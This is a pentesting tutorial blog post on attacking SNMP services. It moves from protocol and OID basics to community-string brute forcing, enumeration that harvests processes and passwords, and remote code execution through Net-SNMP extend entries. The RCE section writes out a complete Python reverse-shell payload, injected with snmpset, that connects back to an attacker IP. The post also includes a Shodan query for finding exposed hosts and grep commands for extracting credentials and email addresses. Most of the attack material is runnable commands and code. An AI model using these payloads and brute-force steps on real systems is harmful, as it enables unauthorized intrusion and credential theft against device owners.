
SNMP Pentesting Best Practices

SNMP

SNMP usually uses UDP ports 161 (queries to the agent) and 162 (traps sent to the manager).

What is SNMP?


SNMP (Simple Network Management Protocol) is an application-layer protocol defined in RFC 1157. It is used to exchange management information between network devices and is one of the most common protocols used for network management. SNMP is part of the TCP/IP suite as standardized by the Internet Engineering Task Force (IETF).

Organizations use SNMP to monitor and manage devices on a local area network (LAN) or wide area network (WAN). Most network devices in the market come bundled with SNMP agents. If not, some devices also allow network admins to install the agents.

SNMP generally uses UDP port 161 for requests and port 162 for traps. An SNMP port is the SNMP communication endpoint: a logical construct that identifies SNMP data transfer. SNMP messages travel over UDP; the Transport Layer Security (TLS) and Datagram Transport Layer Security (DTLS) transports defined in RFC 6353 are also used at times.

PORT    STATE SERVICE REASON                 VERSION
161/udp open  snmp    udp-response ttl 244   ciscoSystems SNMPv3 server (public)

MIB

MIB stands for Management Information Base: a collection of managed objects organized hierarchically and accessed using a protocol such as SNMP. There are two kinds of managed objects: scalar objects define a single object instance, whereas tabular objects define multiple related object instances grouped in MIB tables.

OIDs

OIDs stands for Object Identifiers. OIDs uniquely identify managed objects in a MIB hierarchy. This can be depicted as a tree, the levels of which are assigned by different organizations. Top level MIB object IDs (OIDs) belong to different standard organizations. Vendors define private branches including managed objects for their own products.


SNMP Pentesting

Shodan search query:
port:161,162

There are some well-known OIDs, such as those under 1.3.6.1.2.1, which is MIB-2, the set of standard SNMP variables. From the OIDs hanging below it you can obtain a lot of interesting host data (system data, network data, process data, and so on).

OID Example

1.3.6.1.4.1.1452.1.2.5.1.3.21.1.4.7

Here is a breakdown of this OID.

  • 1 – iso: the root arc administered by ISO. This is why almost every OID you will see starts with “1”.
  • 3 – identified-organization (org).
  • 6 – dod, the US Department of Defense, under whose arc the Internet tree was registered.
  • 1 – internet.
  • 4 – private: objects defined by private organizations rather than by a standards body.
  • 1 – enterprises: the subtree in which each vendor gets its own branch.

This prefix, 1.3.6.1.4.1, is the same for every vendor-private OID. Standard objects live elsewhere: MIB-2 is 1.3.6.1.2.1 (internet.mgmt.mib-2), which is the subtree most of the enumeration commands below walk.

Moving on to the next set of numbers.

  • 1452 – the IANA Private Enterprise Number of the manufacturer; everything below it is defined by that vendor's own MIB.
  • 1 – explains the type of device. In this case, it is an alarm clock.
  • 2 – determines that this device is a remote terminal unit.

The rest of the values give specific information about the device.

  • 5 – denotes a discrete alarm point.
  • 1 – specific point in the device
  • 3 – port
  • 21 – address of the port
  • 1 – display for the port
  • 4 – point number
  • 7 – state of the point

(Example taken from here.)

SNMP Versions

There are three versions of SNMP you will meet:

  • SNMPv1: still the most frequent. Authentication is a community string that travels in plain text, and all the data travels in plain text too.
  • SNMPv2c: same model as v1 (community string as authentication, everything in plain text) with bulk operations added.
  • SNMPv3: user-based authentication (HMAC with MD5 or SHA) and optional encryption of the payload (DES or AES). A dictionary attack against v3 is still possible, but it is much harder and slower than guessing a v1/v2c community string, where a single reply confirms the guess.

Community Strings

As mentioned before, in order to access the information saved on the MIB you need to know the community string on versions 1 and 2/2c and the credentials on version 3.

Two community strings are found by default on many devices:

  • public mainly read only functions
  • private Read/Write in general

Note that the writability of an OID depends on the community string used, so even if you find that “public” is being used, you may still be able to write some values. Also, some objects are always read-only; if you try to write one, a noSuchName or readOnly error (v1) or a notWritable error (v2c) is returned. In versions 1 and 2c, if you use a bad community string the agent simply does not respond, so any response at all proves that a valid community string was used.


Brute-Force Community String (v1 and v2c)

To guess the community string you can perform a dictionary attack. Because a wrong string gets no reply, every reply is a confirmed hit.

msf> use auxiliary/scanner/snmp/snmp_login # Metasploit
nmap -sU --script snmp-brute 192.168.x.x [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 192.168.x.x
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
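The three things the sections above describe (how an OID is encoded, why a v1/v2c community string is "plain text", and why a brute forcer can treat any reply as a valid guess) are easiest to see on the wire. The following is an added example written for this post, not code from the page or from onesixtyone/Metasploit. It builds a real SNMPv1 GetRequest for sysDescr.0 with the standard library only, decodes the reply, and runs the same no-reply-means-wrong check the tools use. The `fake_agent` it talks to is a constructed stand-in whose read community is `public`; against a live target you would replace it with a function that sends the bytes to udp/161 and returns `recv()` or `None` on timeout.

```python
"""SNMPv1 GetRequest/GetResponse on the wire, plus the silent-on-bad-community
check that community-string brute forcers rely on. Added example for this post
(not code from the page or from onesixtyone/Metasploit); standard library only.
The transport is injected as a callable so it runs offline against fake_agent()."""

# --- minimal BER (the wire encoding SNMP uses) ---
def ber_len(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag, payload):
    return bytes([tag]) + ber_len(len(payload)) + payload

def ber_int(v):
    return tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))

def ber_oid(oid):
    """Dotted OID -> BER: first two arcs share one byte (40*a+b), the rest are base-128."""
    arcs = [int(a) for a in oid.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))     # high bit set = another byte follows
            arc >>= 7
        out += bytes(reversed(chunk))
    return tlv(0x06, bytes(out))

def ber_oid_decode(body):
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))

def get_request(community, oid, request_id=1):
    """SNMPv1 GetRequest: version INTEGER 0, community as a plain OCTET STRING, no crypto."""
    varbind = tlv(0x30, ber_oid(oid) + tlv(0x05, b""))                      # OID + NULL
    pdu = tlv(0xA0, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, varbind))
    return tlv(0x30, ber_int(0) + tlv(0x04, community.encode()) + pdu)

def _read_tlv(buf, pos):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                                        # long form
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def parse_message(pkt):
    """Decode a v1/v2c message; requests and responses share this layout."""
    tag, msg, _ = _read_tlv(pkt, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, ver, p = _read_tlv(msg, 0)
    _, comm, p = _read_tlv(msg, p)
    pdu_tag, pdu, _ = _read_tlv(msg, p)
    _, _rid, q = _read_tlv(pdu, 0)
    _, err, q = _read_tlv(pdu, q)
    _, _idx, q = _read_tlv(pdu, q)
    _, vbl, _ = _read_tlv(pdu, q)
    values, q = {}, 0
    while q < len(vbl):
        _, vb, q = _read_tlv(vbl, q)
        _, oid, r = _read_tlv(vb, 0)
        vtag, val, _ = _read_tlv(vb, r)
        values[ber_oid_decode(oid)] = val.decode(errors="replace") if vtag == 0x04 else val
    return {"version": int.from_bytes(ver, "big"), "community": comm.decode(), "pdu_tag": pdu_tag,
            "error_status": int.from_bytes(err, "big", signed=True), "values": values}

SYSDESCR = "1.3.6.1.2.1.1.1.0"

def find_valid_communities(send_fn, candidates, oid=SYSDESCR):
    """v1/v2c agents drop a datagram with a wrong community without replying,
    so any GetResponse (PDU tag 0xA2) proves the candidate is accepted."""
    hits = []
    for comm in candidates:
        resp = send_fn(get_request(comm, oid))
        if resp is not None and parse_message(resp)["pdu_tag"] == 0xA2:
            hits.append((comm, parse_message(resp)["values"].get(oid)))
    return hits

def fake_agent(pkt):
    """Constructed stand-in for a v1 agent whose read community is 'public'."""
    if parse_message(pkt)["community"] != "public":
        return None                                                           # silent drop
    vb = tlv(0x30, ber_oid(SYSDESCR) + tlv(0x04, b"Linux demo 5.15"))
    return tlv(0x30, ber_int(0) + tlv(0x04, b"public")
               + tlv(0xA2, ber_int(1) + ber_int(0) + ber_int(0) + tlv(0x30, vb)))

if __name__ == "__main__":
    pkt = get_request("public", SYSDESCR)
    print(pkt.hex())                       # the community string is readable in the dump
    print(find_valid_communities(fake_agent, ["private", "secret", "public"]))
```

The hex dump printed for `get_request("public", ...)` contains `04 06 70 75 62 6c 69 63` ("public") right after the version byte, which is all a sniffer needs; the same bytes, with `a0` swapped for `a2`, come back in the reply. Note that `find_valid_communities` only sends one datagram per guess; a production scanner should retry on timeout, since a dropped packet and a wrong community look identical to the sender.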

Enumerating SNMP

# netcat check (SNMP is UDP, so -u is required; the agent will not answer without a well-formed request, use nmap -sV for a banner)
nc -nvu 10.10.x.x 161

# banner grabbing with nmap
nmap -sU -p 161 -sV 10.10.x.x
nmap -vv -sV --version-intensity=5 -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes 192.168.x.x

# detect SNMP agents across a subnet with a given community string
onesixtyone 10.10.x.x/24 public


Read info with snmpcheck

snmp-check 10.10.x.x -c public


Enumeration with snmpwalk

snmpwalk -v2c -c public 10.10.x.x
snmpwalk -v2c -c public 10.10.x.x 1.3.6.1.2.1.25.4.2.1.2

# Useful OIDs to pass to snmpwalk directly instead of walking the whole tree

Windows RUNNING PROCESSES   1.3.6.1.2.1.25.4.2.1.2
Windows INSTALLED SOFTWARE  1.3.6.1.2.1.25.6.3.1.2
Windows SYSTEM INFO     1.3.6.1.2.1.1.1
Windows HOSTNAME        1.3.6.1.2.1.1.5
Windows DOMAIN          1.3.6.1.4.1.77.1.4.1
Windows UPTIME          1.3.6.1.2.1.1.3
Windows USERS           1.3.6.1.4.1.77.1.2.25
Windows SHARES          1.3.6.1.4.1.77.1.2.27
Windows DISKS           1.3.6.1.2.1.25.2.3.1.3
Windows SERVICES        1.3.6.1.4.1.77.1.2.3.1.1
Windows LISTENING TCP PORTS 1.3.6.1.2.1.6.13.1.3.0.0.0.0
Windows LISTENING UDP PORTS 1.3.6.1.2.1.7.5.1.2.0.0.0.0

Linux   RUNNING PROCESSES   1.3.6.1.2.1.25.4.2.1.2
Linux   SYSTEM INFO     1.3.6.1.2.1.1.1
Linux   HOSTNAME        1.3.6.1.2.1.1.5
Linux   UPTIME          1.3.6.1.2.1.1.3
Linux   MOUNTPOINTS     1.3.6.1.2.1.25.2.3.1.3
Linux   RUNNING SOFTWARE PATHS  1.3.6.1.2.1.25.4.2.1.4
Linux   LISTENING UDP PORTS 1.3.6.1.2.1.7.5.1.2.0.0.0.0
Linux   LISTENING TCP PORTS 1.3.6.1.2.1.6.13.1.3.0.0.0.0


Enumeration with snmpstatus

snmpstatus -v2c -c 'public' 10.10.x.x


It is recommended to install the following so that the tools can print the name of each OID gathered from the device instead of the raw numbers. On Debian/Kali you also need to comment out the "mibs :" line in /etc/snmp/snmp.conf (or pass -m all to the net-snmp tools), otherwise the downloaded MIBs are never loaded:

apt-get install snmp-mibs-downloader
download-mibs

If you know a valid community string, you can access the data using SNMPWalk or SNMP-Check:

snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP]
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] 1.3.6.1.2.1.4.34.1.3 #Get IPv6, needed dec2hex
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] NET-SNMP-EXTEND-MIB::nsExtendObjects #get extended
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] .1 #Enum all
snmp-check [DIR_IP] -p [PORT] -c [COMM_STRING]
nmap -sU -p 161 --script "snmp* and not snmp-brute" <target>


Thanks to the extend objects (with the MIBs from download-mibs loaded), it is possible to enumerate even more about the system with the following command:

snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull

SNMP exposes a lot of information about the host. Things you may find interesting: network interfaces (IPv4 and IPv6 addresses), usernames, uptime, server/OS version, and running processes together with their arguments (hrSWRunParameters, 1.3.6.1.2.1.25.4.2.1.5), which may contain passwords.
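A full walk of the process OIDs listed above comes back as one line per column per process, and the credentials hide in the arguments column, so it is worth joining the columns back together and searching them. The following is an added example written for this post, not code from the page: it parses snmpwalk output of the hrSWRunTable (name .2, path .4 and parameters .5 under 1.3.6.1.2.1.25.4.2.1), rebuilds one record per process, and flags command lines that look like they carry a secret. `SAMPLE_WALK` is constructed output in the numeric form `snmpwalk -On` prints; the symbolic `HOST-RESOURCES-MIB::hrSWRun*` form printed when MIBs are loaded is accepted too.

```python
"""Parse snmpwalk output of the HOST-RESOURCES hrSWRunTable and flag process
command lines that carry credentials. Added example for this post, not code
from the page; SAMPLE_WALK is constructed data in `snmpwalk -On` form."""
import re
from collections import defaultdict

HR_SWRUN = "1.3.6.1.2.1.25.4.2.1"
COLUMNS = {"2": "name", "4": "path", "5": "args"}          # hrSWRunName/Path/Parameters
SYMBOLIC = {"hrSWRunName": "name", "hrSWRunPath": "path", "hrSWRunParameters": "args"}

# <oid> = <TYPE>: <value>   (net-snmp omits the TYPE: part for empty strings)
LINE_RE = re.compile(r'^(?P<oid>\S+)\s*=\s*(?:(?P<type>[\w-]+):\s*)?(?P<val>.*)$')
# mysql-style -p<secret>, --password=/--token=/--secret=/--key= <value>, user:pass@ in URLs
SECRET_RE = re.compile(r'(?i)(?<!\S)-p\S{2,}|--?(?:pass(?:word|wd)?|token|secret|key)[=\s]\S+'
                       r'|\b[a-z][a-z0-9+.-]*://[^:/\s]+:[^@\s]+@')

SAMPLE_WALK = """\
.1.3.6.1.2.1.25.4.2.1.2.1 = STRING: "systemd"
.1.3.6.1.2.1.25.4.2.1.2.1234 = STRING: "mysql"
.1.3.6.1.2.1.25.4.2.1.2.1300 = STRING: "python3"
.1.3.6.1.2.1.25.4.2.1.2.1400 = STRING: "pg_dump"
.1.3.6.1.2.1.25.4.2.1.4.1 = STRING: "/sbin/init"
.1.3.6.1.2.1.25.4.2.1.4.1234 = STRING: "/usr/bin/mysql"
.1.3.6.1.2.1.25.4.2.1.4.1300 = STRING: "/usr/bin/python3"
.1.3.6.1.2.1.25.4.2.1.4.1400 = STRING: "/usr/bin/pg_dump"
.1.3.6.1.2.1.25.4.2.1.5.1 = ""
.1.3.6.1.2.1.25.4.2.1.5.1234 = STRING: "-u root -pSuperSecret123 appdb"
.1.3.6.1.2.1.25.4.2.1.5.1300 = STRING: "backup.py --token=abc123 /srv/data"
.1.3.6.1.2.1.25.4.2.1.5.1400 = STRING: "postgres://app:hunter2@db.internal/app"
"""

def _column_and_index(oid):
    """Map an OID (numeric, 'iso.'-prefixed, or symbolic) to (column name, hrSWRunIndex)."""
    oid = oid.lstrip(".")
    if oid.startswith("iso."):                      # net-snmp prints 'iso' when MIBs are off
        oid = "1." + oid[4:]
    if oid.startswith(HR_SWRUN + "."):
        col, _, idx = oid[len(HR_SWRUN) + 1:].partition(".")
        return COLUMNS.get(col), idx
    m = re.match(r"HOST-RESOURCES-MIB::(\w+)\.(\d+)$", oid)
    if m:
        return SYMBOLIC.get(m.group(1)), m.group(2)
    return None, None

def parse_processes(text):
    """Join the per-column rows back into one record per process (index = PID)."""
    procs = defaultdict(dict)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        col, idx = _column_and_index(m.group("oid"))
        if col is None or not idx.isdigit():
            continue
        val = m.group("val").strip()
        if len(val) >= 2 and val[0] == val[-1] == '"':
            val = val[1:-1]
        procs[idx][col] = val
    return dict(procs)

def find_credentials(procs):
    """Return (index, command line) for processes whose arguments look like secrets."""
    hits = []
    for idx in sorted(procs, key=int):
        p = procs[idx]
        cmdline = f'{p.get("path") or p.get("name", "")} {p.get("args", "")}'.strip()
        if SECRET_RE.search(cmdline):
            hits.append((idx, cmdline))
    return hits

if __name__ == "__main__":
    for idx, cmd in find_credentials(parse_processes(SAMPLE_WALK)):
        print(f"pid {idx}: {cmd}")
```

Feed it the output of `snmpwalk -On -v2c -c public <IP> 1.3.6.1.2.1.25.4.2.1` and it prints the processes worth a second look. `SECRET_RE` is a heuristic, so expect some false positives (any `-p` flag glued to its value will trip it); the point is to shrink a multi-thousand-line walk to a handful of lines to read by hand.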

From SNMP to RCE

If you have the string that allows you to write values inside the SNMP service, you may be able to abuse it to execute commands.

SNMP is sometimes overlooked by the administrator of the device or server and left in a default configuration. An SNMP community with write permission (rwcommunity in snmpd.conf) on a Linux host running Net-SNMP can be abused to make the agent execute a command, which gives you code execution as the user snmpd runs as. On the defending side, drop rwcommunity entirely: use rocommunity with a restricted view, or SNMPv3 users with authPriv.


Extending the Services

While you cannot modify extend entries that were configured statically in snmpd.conf, it is possible to add additional commands over SNMP, because the MAX-ACCESS of the nsExtend table columns in NET-SNMP-EXTEND-MIB is read-create.

Adding a new command works by appending a row to the nsExtendObjects table with a single snmpset, using the read-write community:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c c0nfig localhost \
'nsExtendStatus."evilcommand"' = createAndGo \
'nsExtendCommand."evilcommand"' = /bin/echo \
'nsExtendArgs."evilcommand"' = 'hello world'

Injecting a command to run on the SNMP service. NET-SNMP-EXTEND-MIB requires that you always provide the absolute path to the executable. The called binary/script must also exist and be executable.


Executing the command we injected into the agent by reading the row back with snmpwalk:

snmpwalk -v2c -c SuP3RPrivCom90 10.129.2.26 NET-SNMP-EXTEND-MIB::nsExtendObjects

Showing that the command is /bin/echo


The command is executed when the row is read: nsExtendRunType defaults to run-on-read, so every walk of the table runs it again.


The command /bin/echo “hello rio is here” was executed during our snmpwalk read


Getting the Shell from Net-SNMP Extend

In this section, I would like to discuss how to gain a server shell to control the server.

You can use python script developed by mxrch that can be downloaded from https://github.com/mxrch/snmp-shell.git

You can install the pre-requisite to run this:

sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt


Creating reverse shell

You can also create a reverse shell manually by injecting the command below over SNMP (the python3 path and the listener address are those of the target and attacker in this example):

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 \
'nsExtendStatus."command10"' = createAndGo \
'nsExtendCommand."command10"' = /usr/bin/python3.6 \
'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.84\",8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'


Run snmpwalk against nsExtendObjects again to trigger the command execution.


Our netcat listener receives the reverse shell connection from the victim, which gives us control over the victim machine.


Massive SNMP

Braa is a mass SNMP scanner. The intended usage of such a tool is, of course, making SNMP queries – but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus, it consumes very few system resources and does the scanning VERY fast.

Braa implements its OWN snmp stack, so it does NOT need any SNMP libraries like net-snmp.

Syntax: braa [Community-string]@[IP of SNMP server]:[iso id]

braa ignite123@192.168.1.125:.1.3.6.*

This can extract many megabytes of information that you cannot process manually.

So, lets look for the most interesting information (from https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/)

Devices

One of the first things I do is extract the sysDesc .1.3.6.1.2.1.1.1.0 MIB data from each file to determine what devices I have harvested information from. This can easily be done using the following grep command:

grep ".1.3.6.1.2.1.1.1.0" *.snmp

Identify private string

As an example, if I can identify the private community string used by an organization on their Cisco IOS routers, then I could possibly use that community string to extract the running configurations from those routers. The best method for finding such data has often been related to SNMP Trap data. So again, using the following grep we can parse through a lot of MIB data quickly searching for the key word of “trap”:

grep -i "trap" *.snmp

Usernames/passwords

Another area of interest is logs, I have discovered that there are some devices that hold logs within the MIB tables. These logs can also contain failed logon attempts. Think about the last time you logged into a device via Telnet or SSH and inadvertently entered your password as the username. I typically search for key words such as fail, failed or login and examine that data to see if there is anything of value.

grep -i "login\|fail" *.snmp

Emails

grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp

Modifying SNMP values

You can use NetScanTools to modify values. You will need to know the private string in order to do so.

Spoofing

If there is an ACL that only allows some IPs to query the SNMP service, you can spoof one of those addresses as the UDP source and sniff the traffic. The agent's reply goes to the spoofed address, not to you, so this only works if you are positioned on the path (or in the same broadcast domain) and can capture the reply.

Examine SNMP Configuration files

  • snmp.conf
  • snmpd.conf
  • snmp-config.xml
This post is licensed under CC BY 4.0 by the author.


Powered by 0xhav0c © 2022